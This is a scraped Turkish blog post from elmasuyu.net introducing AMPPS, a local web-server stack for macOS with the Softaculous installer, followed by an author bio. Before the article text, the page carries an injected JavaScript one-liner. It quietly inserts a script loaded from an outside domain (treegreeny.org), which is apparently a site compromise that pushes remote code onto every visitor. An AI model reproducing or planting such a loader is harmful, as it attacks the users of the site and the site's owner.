;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); AMPPS Localhost - elmasuyu.net
Kategoriler
Mac OS X Yazılım

AMPPS Localhost

AMPPS Apache, MySQL, PHP, Perl, Python ve Masaüstü ve ofis sunucularda kullanılabilir. Softaculous oto-yükleyici yazılım yığını’nı yüklemek kolaydır. AMPPS ile özelleştirerek, 260 adet çeşitli uygulama yükleyerek bir web sitesi oluşturabilir ve daha sonra sadece barındırma hizmeti sağlayıcıları gibi geniş bir seçim yoluyla internet üzerinden yayımlanması bile yapılabilir.

 

Masaüstünüzde Softaculous ile AMPPS kullanarak, Web sitenizi internette kullandığınız gibi güçlü veritabanı altyapısı ve bir çok CMS sisteme uyumluluğu ile kendi bilgisayarınızda çalıştırabilirsiniz.Joomla,Wordpress,Drupal gibi CMS sistemlerini uğraşmadan kurabilirsiniz.Diğer localhost kurulumlarından en büyük farkı içerisinde ki Softaculos web uygulama yükleme merkezi sayesinde 260’dan fazla web uygulamasını indirme veya ayarlamalar ile hiç uğraşmadan otomatik olarak sizin yerinize kurulum yapar.

Uygulamayı indirmek için tıklayın.

Uygulamanın wen sayfasına gitmek için tıklayın.

 

 

Yazar Sait Fırat NEMİŞ

ElmaSuyu.Net Yöneticisi - Server Administrator Özel bir kurumda Bilgi Teknolojileri Sorumlusu olarak çalışıyor.Unix,Linux ve terminal bağımlısı,özellikle Apple işletim sistemleri ile ilgili araştırmalar ve geliştirmeler ile uğraşıyor.